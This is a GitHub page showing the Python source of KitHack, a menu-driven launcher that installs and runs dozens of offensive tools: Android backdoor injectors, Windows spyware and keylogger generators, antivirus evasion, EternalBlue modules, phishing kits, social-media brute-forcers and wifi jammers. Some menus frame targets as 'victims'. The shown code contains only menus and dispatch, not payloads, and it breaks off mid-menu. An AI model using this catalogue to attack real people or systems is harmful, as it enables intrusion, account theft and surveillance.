forked from AdrMXR/KitHack
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathKitHack.py
executable file
·4252 lines (3923 loc) · 228 KB
/
KitHack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#Copyright 2021 KITHACK
#Written by: Adrian Guillermo
#Facebook: https://facebook.com/adrian.guillermo.22
#Github: https://github.com/AdrMXR
BLUE, RED, WHITE, CYAN, DEFAULT, YELLOW, MAGENTA, GREEN, END, BOLD = '\33[94m', '\033[91m', '\33[97m', '\033[36m', '\033[0m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m', '\033[1m'
import sys
import os
import subprocess
import time
import requests
import webbrowser
from sys import exit
from getch import pause
from tkinter import Tk, filedialog
from lib.banners import *
from lib import kitools
from lib.network import run_network
def check_connection(host='https://www.google.com'):
print("{}Verificando su conexion a internet...".format(GREEN))
time.sleep(0.5)
try:
req = requests.get(host, timeout=15)
if req.status_code == 200:
print("{}Conexion a internet exitosa.".format(GREEN))
time.sleep(0.5)
pass
except:
print("{0}[x]:{1} Verifique su conexion a internet.".format(RED, DEFAULT))
exit(0)
def check_permissions():
if os.getuid() == 0:
info()
else:
os.system('clear')
print("{0}[!]{1} ¡Permiso denegado! Recuerde ejecutar: {2}sudo {1}python3 KitHack.py".format(RED, DEFAULT, GREEN))
exit(0)
def info():
os.system('clear')
print("{0}[VERSION]:{1} 1.3.2\n\n".format(RED, DEFAULT))
time.sleep(0.5)
print("{0}[AUTOR]:{1} Adrian Guillermo\n\n".format(RED, DEFAULT))
time.sleep(0.5)
print("{0}[GITHUB]:{1} https://www.github.com/AdrMXR\n\n".format(RED, DEFAULT))
time.sleep(0.5)
print("{0}[FACEBOOK]:{1} https://www.facebook.com/adrian.Guillermo.22\n\n".format(RED, DEFAULT))
time.sleep(0.5)
print("{0}[INSTAGRAM]:{1} https://www.instagram.com/adrian.guillermo22\n\n".format(RED, DEFAULT))
time.sleep(0.5)
print("{0}[YOUTUBE]:{1} https://www.youtube.com/channel/UCqEtxJKbIghx6lyymrjfvnA\n".format(RED, DEFAULT))
time.sleep(2.5)
os.system('clear')
def main():
print(start_main_menu)
option = input("{0}KitHack >> {1}".format(RED, DEFAULT))
option = option.zfill(2)
if option == '01':
os.system('clear')
print ('========={0}Tool{1}==================================={0}Information{1}================================'.format(GREEN, DEFAULT))
print ('{0}01){1} Backdoor-apk {2}Agrega una puerta trasera a cualquier archivo APK.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}02){1} Evil-Droid {2}Genera puertas traseras para Android.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}03){1} Spade {2}Script en python que genera una puerta trasera a cualquier APK.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}04){1} AhMyth {2}Herramienta de administración remota de Android.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}05){1} Andspoilt {2}Ejecuta exploits interactivos de Android en Linux.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}06){1} Kwetza {2}Inyecta malware en aplicaciones android existentes.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}07){1} Termux {2}Emulador de terminal Android basada en Linux.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}08){1} Android-Exploits {2}Coleccion de exploits y hacks Android.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}09){1} Grabcam {2}Permite piratear la cámara de nuestras victimas con una página falsa.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}10){1} Androidpatternlock {2}Permite obtener el patrón de bloqueo en dispositivos Android.'.format(WHITE, YELLOW, DEFAULT))
print ('{0} 0){1} Back'.format(WHITE, YELLOW))
tool = input("{0}KitHack >> {1}".format(RED, DEFAULT))
tool = tool.zfill(2)
if tool == '00':
os.system('clear')
main()
elif tool == '01':
kitools.BackdoorApk()
elif tool == '02':
kitools.EvilDroid()
elif tool == '03':
kitools.Spade()
elif tool == '04':
kitools.AhMyth()
elif tool == '05':
kitools.Andspoilt()
elif tool == '06':
kitools.Kwetza()
elif tool == '07':
kitools.Termux()
elif tool == '08':
kitools.AndroidExploits()
elif tool == '09':
kitools.Grabcam()
elif tool == '10':
kitools.AndroidPatternLock()
else:
print("\n{}[X] OPCION INVALIDA".format(RED))
time.sleep(1.5)
os.system('clear')
main()
elif option == '02':
os.system('clear')
print ('========{0}Tool{1}================================================{0}Information{1}==================================='.format(GREEN, DEFAULT))
print ('{0}01){1} Winpayloads {2}Generador de payloads indetectables en Windows.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}02){1} sAINT {2}Generador de spyware para sistemas Windows.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}03){1} BeeLogger {2}Generador de Keyloggers gmail para Windows.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}04){1} FakeImageExploiter {2}Inyecta malware en imagenes jpg para Windows.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}05){1} Koadic {2}Rootkit de Windows posterior a una explotacion.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}06){1} Phantom Evasion {2}Herramienta de evasion de Antivirus.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}07){1} Ps1encode {2}Generador y codificador de payloads basados en PowerShell.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}08){1} DKMC {2}Herramienta de evasion de carga maliciosa.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}09){1} Cromos {2}Inyecta codigo en extensiones legitimas de Chrome Web.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}10){1} Eternal_scanner {2}Escáner para el exploit Eternal Blue y Eternal Romance.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}11){1} EternalblueDoublepulsar {2}Módulo de Metasploit para explotar la vulnerabilidad Eternalblue-Doublepulsar.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}12){1} EternalBlueWinXPWin10 {2}Modulo de Metasploit EternalBlue desde Windows XP SP2 hasta Windows 10 Pro.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}13){1} Windows-Exploits {2}Coleccion de Exploits Windows.'.format(WHITE, YELLOW, DEFAULT))
print ('{0} 0){1} Back'.format(WHITE, YELLOW))
tool = input("{0}KitHack >> {1}".format(RED, DEFAULT))
tool = tool.zfill(2)
if tool == '00':
os.system('clear')
main()
elif tool == '01':
kitools.Winpayloads()
elif tool == '02':
kitools.sAINT()
elif tool == '03':
kitools.BeeLogger()
elif tool == '04':
kitools.FakeImageExploiter()
elif tool == '05':
kitools.Koadic()
elif tool == '06':
kitools.PhantomEvasion()
elif tool == '07':
kitools.Ps1encode()
elif tool == '08':
kitools.DKMC()
elif tool == '09':
kitools.Cromos()
elif tool == '10':
kitools.EternalScanner()
elif tool == '11':
kitools.EternalblueDoublepulsarMetasploit()
elif tool == '12':
kitools.MS17010EternalBlueWinXPWin10()
elif tool == '13':
kitools.WindowsExploits()
else:
print("\n{}[X] OPCION INVALIDA".format(RED))
time.sleep(1.5)
os.system('clear')
main()
elif option == '03':
os.system('clear')
print ('======={0}Tool{1}======================================={0}Information{1}====================================='.format(GREEN, DEFAULT))
print ('{0}01){1} HiddenEye {2}Herramienta de phishing moderna con funcionalidad avanzada.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}02){1} PhishX {2}Generador de phishing y spoofing.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}03){1} SocialPhish {2}Herramienta phishing con 32 plantillas + 1 personalizable.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}04){1} SocialFish {2}Herramienta educativa de phishing.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}05){1} PhisherMan {2}Herramienta phishing con 17 plantillas y funcional con ngrok.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}06){1} Spectre {2}Admite ataques de phishing casi con cualquier sitio web.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}07){1} Blackeye {2}Herramienta de phishing con 38 sitios web disponibles.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}08){1} PhEmail {2}Automatiza procesos de envío de correos electrónicos de phishing.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}09){1} Weeman {2}Servidor HTTP para phishing.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}10){1} Zphisher {2}Herramienta de phishing automatizada.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}11){1} AIOPhish {2}Herramienta phishing con diferentes opciones.'.format(WHITE, YELLOW, DEFAULT))
print ('{0} 0){1} Back'.format(WHITE, YELLOW))
tool = input("{0}KitHack >> {1}".format(RED, DEFAULT))
tool = tool.zfill(2)
if tool == '00':
os.system('clear')
main()
elif tool == '01':
kitools.HiddenEye()
elif tool == '02':
kitools.PhishX()
elif tool == '03':
kitools.SocialPhish()
elif tool == '04':
kitools.SocialFish()
elif tool == '05':
kitools.PhisherMan()
elif tool == '06':
kitools.Spectre()
elif tool == '07':
kitools.Blackeye()
elif tool == '08':
kitools.PhEmail()
elif tool == '09':
kitools.Weeman()
elif tool == '10':
kitools.Zphisher()
elif tool == '11':
kitools.AIOPhish()
else:
print("\n{}[X] OPCION INVALIDA".format(RED))
time.sleep(1.5)
os.system('clear')
main()
elif option == '04':
os.system('clear')
print ('======={0}Tool{1}====================================={0}Information{1}======================================'.format(GREEN, DEFAULT))
print ('{0}01){1} Fluxion {2}herramienta de auditoría de redes e ingeniería social.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}02){1} Wifiphisher {2}herramienta que permite capturar contraseñas wifi mediante AP.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}03){1} Wifibroot {2}herramienta wifi Pentest Cracking para WPA/WPA2. '.format(WHITE, YELLOW, DEFAULT))
print ('{0}04){1} Wifite {2}Ejecuta herramientas de auditoría inalámbrica existentes para usted.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}05){1} Ettercap {2}Interceptor/sniffer/registrador para LANs con switch.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}06){1} Linset {2}Herramienta de phishing WPA/WPA2.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}07){1} WiFi-Pumpkin {2}Framework de AP para crear facilmente redes falsas.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}08){1} Wifresti {2}Localiza tu contraseña de red inalámbrica en Windows, Linux y Mac OS.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}09){1} Evil Limiter {2}Herramienta que limita el ancho de banda de los dispositivos.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}10){1} Netool-toolkit {2}Kit de herramientas de código abierto de pentesting de MitM.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}11){1} Dracnmap {2}Herramienta que se utiliza para explotar redes y recopilar datos con nmap.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}12){1} Airgeddon {2}Script en bash para auditar redes inalambricas.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}13){1} Routersploit {2}Se compone de varios módulos que ayudan a operar pruebas de penetracion.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}14){1} Eaphammer {2}Kit para realizar ataques dirigidos contra redes WPA2-Enterprise.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}15){1} VMR-MDK {2}Script para descifrar redes inalámbricas WPS.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}16){1} Wirespy {2}Permite configurar honeypots rápidos para llevar a cabo MITMA.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}17){1} Wireshark {2}Analizador de redes que te permite capturar y navegar en el trafico de una red.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}18){1} SniffAir {2}Framework para pentesting inalámbrico.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}19){1} WifiJammer {2}Atasca continuamente todos los clientes/enrutadores wifi.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}20){1} KawaiiDeauther {2}Bloquea todos los clientes/enrutadores wifi.'.format(WHITE, YELLOW, DEFAULT))
print ('{0} 0){1} Back'.format(WHITE, YELLOW))
tool = input("{0}KitHack >> {1}".format(RED, DEFAULT))
tool = tool.zfill(2)
if tool == '00':
os.system('clear')
main()
elif tool == '01':
kitools.Fluxion()
elif tool == '02':
kitools.Wifiphisher()
elif tool == '03':
kitools.Wifibroot()
elif tool == '04':
kitools.Wifite()
elif tool == '05':
kitools.Ettercap()
elif tool == '06':
kitools.Linset()
elif tool == '07':
kitools.WiFiPumpkin()
elif tool == '08':
kitools.Wifresti()
elif tool == '09':
kitools.EvilLimiter()
elif tool == '10':
kitools.NetoolToolkit()
elif tool == '11':
kitools.Dracnmap()
elif tool == '12':
kitools.Airgeddon()
elif tool == '13':
kitools.Routersploit()
elif tool == '14':
kitools.Eaphammer()
elif tool == '15':
kitools.VMRMDK()
elif tool == '16':
kitools.Wirespy()
elif tool == '17':
kitools.Wireshark()
elif tool == '18':
kitools.SniffAir()
elif tool == '19':
kitools.WifiJammer()
elif tool == '20':
kitools.KawaiiDeauther()
else:
print("\n{}[X] OPCION INVALIDA".format(RED))
time.sleep(1.5)
os.system('clear')
main()
elif option == '05':
os.system('clear')
print ('======={0}Tool{1}====================================={0}Information{1}================================'.format(GREEN, DEFAULT))
print ('{0}01){1} Cupp {2}Permite crear diccionarios específicamente para una persona.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}02){1} Facebooker {2}Script en perl que realiza fuerza bruta contra Facebook.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}03){1} BluForce-FB {2}Ataques de fuerza bruta en cuentas de Facebook.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}04){1} Brut3k1t {2}Ataques de fuerza bruta contra una multitud de protocolos y servicios.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}05){1} SocialBox {2}Framework de fuerza bruta [Facebook, Gmail, Instagram, Twitter].'.format(WHITE, YELLOW, DEFAULT))
print ('{0}06){1} John The Ripper {2}Programa que aplica fuerza bruta para descifrar contraseñas.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}07){1} Hashcat {2}Herramienta para la recuperación de contraseñas.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}08){1} Brutedum {2}Ataca SSH, FTP, Telnet, PostgreSQL, RDP, VNC con Hydra, Medusa y Ncrack.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}09){1} Facebash {2}Ataque de fuerza bruta para facebook en shellscript usando TOR.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}10){1} Brutespray {2}Automatiza el escaneo de puertos y realiza ataques por fuerza bruta.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}11){1} Pupi {2}Pupi es un generador de contraseñas simple a partir de información personal.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}12){1} B4r-brute {2}Script para crackear cuentas de Facebook usando la ID del usuario.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}13){1} Fb-Hack {2}Script de recuperación y pirateo de contraseña de Facebook.'.format(WHITE, YELLOW, DEFAULT))
print ('{0} 0){1} Back'.format(WHITE, YELLOW))
tool = input("{0}KitHack >> {1}".format(RED, DEFAULT))
tool = tool.zfill(2)
if tool == '00':
os.system('clear')
main()
elif tool == '01':
kitools.Cupp()
elif tool == '02':
kitools.Facebooker()
elif tool == '03':
kitools.BluForceFB()
elif tool == '04':
kitools.Brut3k1t()
elif tool == '05':
kitools.SocialBox()
elif tool == '06':
kitools.JohnTheRipper()
elif tool == '07':
kitools.Hashcat()
elif tool == '08':
kitools.Brutedum()
elif tool == '09':
kitools.Facebash()
elif tool == '10':
kitools.Brutespray()
elif tool == '11':
kitools.Pupi()
elif tool == '12':
kitools.B4rbrute()
elif tool == '13':
kitools.FbHack()
else:
print("\n{}[X] OPCION INVALIDA".format(RED))
time.sleep(1.5)
os.system('clear')
main()
elif option == '06':
os.system('clear')
print ('======={0}Tool{1}========================================={0}Information{1}========================================'.format(GREEN, DEFAULT))
print ('{0}01){1} SQLmap {2}Inyección SQL y toma de control de los servidores de bases de datos.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}02){1} XAttacker {2}Escáner de vulnerabilidades de sitios web.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}03){1} Fuxploider {2}Detecta técnicas favorables para cargar shells web o cualquier archivo malicioso.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}04){1} Wordpresscan {2}Escáner de WordPress de vulnerabilidades.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}05){1} SiteBroker {2}Recopila información y automatiza pruebas de penetración en sitios web.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}06){1} NoSQLMap {2}Explotacion de debilidades de configuración predeterminadas en bases de datos NoSQL.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}07){1} Sqli-scanner {2}Escanear de sitios web vulnerables a la inyección de SQL destinado a una lista de URL.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}08){1} Joomscan {2}Permite escanear sitios web y detectar configuraciones erroneas o deficiencias.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}09){1} Metagoofil {2}Extractor de metadatos de documentos públicos (pdf, doc, xls, ppt, etc.).'.format(WHITE, YELLOW, DEFAULT))
print ('{0}10){1} Sublist3r {2}Herramienta rápida de enumeración de subdominios para probadores de penetración.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}11){1} WAFNinja {2}Programa que contiene dos funciones para atacar firewalls de aplicaciones web.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}12){1} Dirsearch {2}Diseñada para directorios y archivos de fuerza bruta en sitios web.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}13){1} XSStrike {2}El escáner XSS más avanzado.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}14){1} LinksF1nd3r {2}Extractor de componentes web.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}15){1} D-TECT {2}Herramienta moderna para realizar pentesting en sitios web.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}16){1} Phpsploit {2}Herramienta capaz de mantener el acceso a un servidor web comprometido.'.format(WHITE, YELLOW, DEFAULT))
print ('{0} 0){1} Back'.format(WHITE, YELLOW))
tool = input("{0}KitHack >> {1}".format(RED, DEFAULT))
tool = tool.zfill(2)
if tool == '00':
os.system('clear')
main()
elif tool == '01':
kitools.SQLmap()
elif tool == '02':
kitools.XAttacker()
elif tool == '03':
kitools.Fuxploider()
elif tool == '04':
kitools.Wordpresscan()
elif tool == '05':
kitools.SiteBroker()
elif tool == '06':
kitools.NoSQLMap()
elif tool == '07':
kitools.SqliScanner()
elif tool == '08':
kitools.Joomscan()
elif tool == '09':
kitools.Metagoofil()
elif tool == '10':
kitools.Sublist3r()
elif tool == '11':
kitools.WAFNinja()
elif tool == '12':
kitools.Dirsearch()
elif tool == '13':
kitools.XSStrike()
elif tool == '14':
kitools.LinksF1nd3r()
elif tool == '15':
kitools.DTECH()
elif tool == '16':
kitools.Phpsploit()
else:
print("\n{}[X] OPCION INVALIDA".format(RED))
time.sleep(1.5)
os.system('clear')
main()
elif option == '07':
os.system('clear')
print ('======={0}Tool{1}====================================={0}Information{1}=================================='.format(GREEN, DEFAULT))
print ('{0}01){1} SpoofMAC {2}Permite modificar su direccion MAC para depurar.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}02){1} Ip_spoofing {2}ARP spoofing, HTTP spoofing && Dos.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}03){1} Arpspoof {2}Ataque de falsificación de ARP utilizando sockets del kernel de Linux.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}04){1} DerpNSpoof {2}Herramienta de suplantación de DNS simple.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}05){1} DrSpoof {2}Herramienta para detectar y detener ataques ARP Spoofing en su red local.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}06){1} GODKILLER {2}SMS-BOMBER y SMS-SENDER.'.format(WHITE, YELLOW, DEFAULT))
print ('{0} 0){1} Back'.format(WHITE, YELLOW))
tool = input("{0}KitHack >> {1}".format(RED, DEFAULT))
tool = tool.zfill(2)
if tool == '00':
os.system('clear')
main()
elif tool == '01':
kitools.SpoofMAC()
elif tool == '02':
kitools.IpSpoofing()
elif tool == '03':
kitools.Arpspoof()
elif tool == '04':
kitools.DerpNSpoof()
elif tool == '05':
kitools.DrSpoof()
elif tool == '06':
kitools.GODKILLER()
else:
print("\n{}[X] OPCION INVALIDA".format(RED))
time.sleep(1.5)
os.system('clear')
main()
elif option == '08':
os.system('clear')
print ('========={0}Tool{1}========================================{0}Information{1}========================================'.format(GREEN, DEFAULT))
print ('{0}01){1} NMAP {2}Obtiene información de los host, puertos y servicios dentro de una red.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}02){1} Th3inspector {2}Herramienta todo en uno para recopilar información.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}03){1} FBI {2}Recopilación de información confidencial en cuentas de Facebook.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}04){1} Infoga {2}Extrae información de cuentas de correo electrónico.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}05){1} Crips {2}Obtiene información sobre direcciones IP, paginas web y registros DNS.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}06){1} BillCipher {2}Recopilación de información para un sitio web o direccion IP.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}07){1} RED_HAWK {2}Herramienta para recopilar información, escanear vulnerabilidades y rastreo.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}08){1} Recon-ng {2}Herramienta precargada con gran cantidad de modulos para recopilar información.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}09){1} theHarvester {2}Recopilación de correos electrónicos, nombres, subdominios, direcciones IP y URL.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}10){1} PhoneInfoga {2}Obtiene información sobre numeros de telefono utilizando recursos gratuitos.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}11){1} Gasmask {2}Herramienta de recopilación de información todo en uno.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}12){1} URLextractor {2}Recopilación de información y reconocimiento de sitios web.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}13){1} Devploit {2}Busqueda de DNS, Whois, IP, GeoIP, subred, puertos, host, etc.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}14){1} ReconDog {2}Herramienta todo en uno para recopilar información básica.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}15){1} Webkiller {2}Kit de recopilación de información.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}16){1} Quasar {2}Framework de recopilación de información.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}17){1} Info-instagram {2}Permite extraer información de cuentas de instagram.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}18){1} UserScan {2}Scanner de indentidad con el que podras buscar cuentas que tengan un username.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}19){1} XCTR-Hacking {2}Herramientas todo en uno para la recopilación de información.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}20){1} DeadTrap {2}Herramienta OSINT para rastrear huellas de un número de teléfono.'.format(WHITE, YELLOW, DEFAULT))
print ('{0} 0){1} Back'.format(WHITE, YELLOW))
tool = input("{0}KitHack >> {1}".format(RED, DEFAULT))
tool = tool.zfill(2)
if tool == '00':
os.system('clear')
main()
elif tool == '01':
kitools.NMAP()
elif tool == '02':
kitools.Th3inspector()
elif tool == '03':
kitools.FBI()
elif tool == '04':
kitools.Infoga()
elif tool == '05':
kitools.Crips()
elif tool == '06':
kitools.BillCipher()
elif tool == '07':
kitools.RedHawk()
elif tool == '08':
kitools.ReconNg()
elif tool == '09':
kitools.theHarvester()
elif tool == '10':
kitools.PhoneInfoga()
elif tool == '11':
kitools.Gasmask()
elif tool == '12':
kitools.URLextractor()
elif tool == '13':
kitools.Devploit()
elif tool == '14':
kitools.ReconDog()
elif tool == '15':
kitools.Webkiller()
elif tool == '16':
kitools.Quasar()
elif tool == '17':
kitools.InfoInstagramIphone()
elif tool == '18':
kitools.UserScan()
elif tool == '19':
kitools.XCTRHackingTools()
elif tool == '20':
kitools.DeadTrap()
else:
print("\n{}[X] OPCION INVALIDA".format(RED))
time.sleep(1.5)
os.system('clear')
main()
elif option == '09':
os.system('clear')
print ('======{0}Tool{1}===================================================={0}Information{1}======================================='.format(GREEN, DEFAULT))
print ('{0}01){1} TheFatRat {2}Herramienta que compila malware para ejecutar en Linux, Windows, Mac y Android.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}02){1} Msfpc {2}Contenedor para generar múltiples cargas útiles, según la elección de los usuarios.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}03){1} Fcrackzip {2}Script para descifrar archivos ZIP encriptados por contraseña.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}04){1} QRLjacker {2}Vector de ataque capaz de secuestrar sesiones que dependen de algun codigo QR.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}05){1} Lazy {2}Script que automatiza muchos procesos de penetracion.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}06){1} HTBINVITE {2}Generador de codigos de invitacion para HackTheBox.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}07){1} Ngrok {2}Proxy inverso que crea un túnel seguro desde un punto público a un servicio local.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}08){1} Bluepot {2}Honeypot Bluetooth escrito en Java.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}09){1} Setoolkit {2}Marco de prueba de penetración de código abierto diseñado para la ingeniería social.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}10){1} A2sv {2}Vulnerabilidad de escaneo automático a SSL.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}11){1} 4nonimizer {2}Anonimiza la IP pública utilizada para navegar por Internet mediante proveedores VPN.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}12){1} Easysploit {2}Automatización de Metasploit.'.format(WHITE, YELLOW, DEFAULT))
print ('{0}13){1} NXcrypt {2}Inyección de malware en archivos con formato python.'.format(WHITE, YELLOW, DEFAULT))
